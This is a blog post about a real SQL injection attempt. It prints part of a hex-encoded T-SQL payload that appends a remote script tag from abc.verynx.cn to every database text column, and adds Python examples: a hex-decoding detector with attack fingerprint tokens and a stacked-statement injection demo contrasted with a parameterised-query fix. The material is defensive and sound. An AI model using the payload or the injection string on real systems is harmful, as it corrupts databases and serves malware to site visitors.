by Bobbi Perreault
14. August 2008 03:15
There was an interesting topic that came up today on the LinkedIn Minnesota Group - that of an anonymous business that had had their entire SQL database filled with junk from a hack attack.
The first thing that came to my mind there was SQL injection. It's insidious, and dangerous, and the crooks are very bold in their efforts to use it.
I have a perfect example of one of those types of web site visits where the low-life-can-it-be-human (LLCIBH) who was at the page was trying to inject poison into the site. My sites inform me of any failed access attempts or errors in an email - and that email includes all the information I may need to troubleshoot the problem. So, on this day I was notified by email of the full contents of the request.
The LLCIBH (translation above) sent a hexadecimal-encoded, very long query string at the site, which when decoded contained SQL that looked something like this:
-- The request as received. The attacker's T-SQL rides inside the 0x... literal,
-- hex-encoded so that the raw request contains none of the quotes or keywords a
-- filter or a person reading the log would look for. The middle of the hex dump
-- is left out below, exactly as in the original post.
DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343
0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656374206
12E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622
.................stuff left out here..........
6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272729464554434820
4E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F53
45205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));
-- 'select @s' prints the decoded string so it can be read; the attacker's
-- EXEC(@S), which would actually run it, is left commented out.
select @s
--EXEC(@S);
Decoded, that mess is a T-SQL batch. It declares two variables, @T and @C, opens a cursor (Table_Cursor) over sysobjects joined to syscolumns, which is SQL Server's own catalogue of tables and their columns, and then, for EACH and EVERY table and column the cursor fetches, runs an UPDATE that appends a <script> tag loading w.js from abc.verynx.cn onto whatever text the column already held. The trailing FETCH NEXT ... END CLOSE Table_Cursor DEALLOCATE Table_Cursor is just the loop scaffolding. The database is only the delivery vehicle: every page that later renders any of those columns serves the attacker's JavaScript to its visitors, which is the point of the exercise.
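What the author's alert email left to a human, decoding the 0x... literal and recognising it, is easy to automate. The following Python is an added example and not code from the original post: it decodes the two hex runs the post prints (the elided middle is not reconstructed) and scans a request query string for long hex literals whose decoded text carries the fingerprints of this payload family. The request line it scans is constructed for the example; the only part taken from the post is the first hex fragment.

```python
import re
from urllib.parse import unquote

# The two hex runs printed in the post, copied as transcribed there. The post
# leaves out the middle of the string, so HEAD and TAIL are separate fragments
# and the gap between them is not reconstructed.
PAYLOAD_HEX_HEAD = (
    "4445434C415245204054207661726368617228323535292C4043207661726368617228343"
    "0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656374206"
    "12E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622"
)
PAYLOAD_HEX_TAIL = (
    "6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272729464554434820"
    "4E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F53"
    "45205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
)

# Fingerprints of this payload family once the hex is decoded. Compared in
# lower case, because T-SQL keywords and catalogue names are case-insensitive.
SUSPICIOUS_TOKENS = ("sysobjects", "syscolumns", "cursor", "declare @",
                     "exec(", "<script", "</script>", "update ")

# 16 bytes or more of hex: short literals (colours, small ids) are normal traffic.
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{32,})")
CAST_PATTERN = re.compile(r"cast\s*\(\s*0x", re.IGNORECASE)


def decode_hex_literal(hex_digits: str) -> str:
    """Turn a T-SQL 0x... literal into the text CAST(... AS CHAR) would produce."""
    if len(hex_digits) % 2:
        # The post's transcription stops in the middle of a byte; drop the
        # dangling nibble. A payload on the wire is byte-aligned.
        hex_digits = hex_digits[:-1]
    return bytes.fromhex(hex_digits).decode("latin-1")


def scan_query_string(raw: str) -> list:
    """One finding per long hex literal whose decoded text carries attack tokens."""
    qs = unquote(raw)                       # %20 and friends back to characters
    findings = []
    for m in HEX_LITERAL.finditer(qs):
        decoded = decode_hex_literal(m.group(1))
        lowered = decoded.lower()
        hits = [t for t in SUSPICIOUS_TOKENS if t in lowered]
        if not hits:
            continue
        # Was the literal wrapped in CAST(0x... ? That is the tell-tale shape.
        before = qs[max(0, m.start() - 16):m.start() + 2]
        findings.append({
            "offset": m.start(),
            "inside_cast": bool(CAST_PATTERN.search(before)),
            "tokens": hits,
            "decoded": decoded,
        })
    return findings


# Constructed sample request in the shape the post describes: the attacker's
# batch riding on a numeric parameter, with the T-SQL carried as a hex literal.
# Only the hex is from the post; the surrounding request is an assumption.
SAMPLE_ATTACK = ("page.asp?id=1;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
                 + PAYLOAD_HEX_HEAD + "%20AS%20CHAR(4000));EXEC(@S);--")
SAMPLE_BENIGN = "page.asp?id=42&theme=0xFF8800"   # a short hex value, left alone

if __name__ == "__main__":
    for f in scan_query_string(SAMPLE_ATTACK):
        print(f"hex literal at offset {f['offset']}, inside CAST: {f['inside_cast']}")
        print("  tokens :", ", ".join(f["tokens"]))
        print("  decoded:", f["decoded"])
    print("benign request findings:", scan_query_string(SAMPLE_BENIGN))
    print("tail fragment decodes to:", decode_hex_literal(PAYLOAD_HEX_TAIL))
```

Scoring on the decoded content rather than on the raw request is the whole point: the query string as sent contains no quotes, no sysobjects and no <script, so a filter that looks for those literal strings never fires. The dangling nibble in the first fragment is an artefact of the post's transcription, not of the attack.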
If this happens to anyone, they should just plan on restoring from a backup taken before the first injection. The mess is too insidious, too entangled to fix by hand: the payload touches every text column in every table it can reach, and the database is basically ruined. Two cautions before restoring, though. Fix the injectable page first, because the same automated attack will simply refill a restored database through the same hole; and keep the tainted copy and the web server logs, since the request that did the damage tells you which page and parameter were hit.
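The one change that would have stopped this request is to stop building SQL by pasting request parameters into statement text. The example below is added here and is not the author's code. It uses Python's sqlite3 module with a constructed three-row table, and executescript() stands in for a driver that, like SQL Server's, runs every statement in a batch it is handed. The attack value appends the same kind of script tag the post's hex dump shows (the src URL is the one visible in the dump; the rest of the tag is the usual shape and is an assumption), and the parameterised lookup is the fix.

```python
import sqlite3

# The tag the post's decoded payload appends to every column it reaches. The
# src URL is the one visible in the post's hex dump; the rest of the tag is the
# usual shape for this attack and is an assumption.
INJECTED_TAG = '<script src="http://abc.verynx.cn/w.js"></script><!--'

# Attacker-controlled value for the page's "id" parameter. Everything after the
# first ';' is a second, stacked statement, the same trick the post's
# DECLARE/SET/EXEC batch relies on. (Constructed for this example.)
ATTACK_ID = f"1; UPDATE news SET title = title || '{INJECTED_TAG}';"


def make_db() -> sqlite3.Connection:
    """Constructed three-row table standing in for one of the site's content tables."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO news (title) VALUES (?)",
                    [("Board meeting",), ("New hire",), ("Picnic",)])
    con.commit()
    return con


def handle_request_vulnerable(con: sqlite3.Connection, user_id: str) -> None:
    """The bug: the request parameter is pasted into the statement text.
    executescript() stands in for a driver that, like SQL Server's, runs every
    ';'-separated statement it is handed; sqlite3's execute() would refuse the
    second statement, which is a driver accident, not a defence."""
    con.executescript(f"SELECT title FROM news WHERE id = {user_id}")


def lookup_safe(con: sqlite3.Connection, user_id: str) -> list:
    """The fix: a parameterised query. The value is bound as data, so the ';'
    and the UPDATE inside it are never parsed as SQL."""
    rows = con.execute("SELECT title FROM news WHERE id = ?", (user_id,)).fetchall()
    return [r[0] for r in rows]


def titles(con: sqlite3.Connection) -> list:
    """Current contents of the text column, in id order."""
    return [r[0] for r in con.execute("SELECT title FROM news ORDER BY id")]


def tainted_ids(con: sqlite3.Connection) -> list:
    """The check to run on a hit database: rows whose text now carries a script tag."""
    rows = con.execute("SELECT id FROM news WHERE title LIKE '%<script%' ORDER BY id")
    return [r[0] for r in rows]


if __name__ == "__main__":
    con = make_db()
    print("safe lookup, normal id :", lookup_safe(con, "1"))
    print("safe lookup, attack id :", lookup_safe(con, ATTACK_ID),
          "-> tainted rows:", tainted_ids(con))
    handle_request_vulnerable(con, ATTACK_ID)
    print("after vulnerable lookup, tainted rows:", tainted_ids(con))
    for t in titles(con):
        print("  ", t)
```

With the parameterised query the attack string is compared against the id column as a value, matches nothing, and the table is untouched; with string concatenation a single request rewrites every row. The tainted_ids() query is the same idea as the attacker's cursor turned around: walk the text columns and look for the tag, which is how you confirm a hit and how you verify the restored copy is clean.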
Be Careful Out There.
Bobbi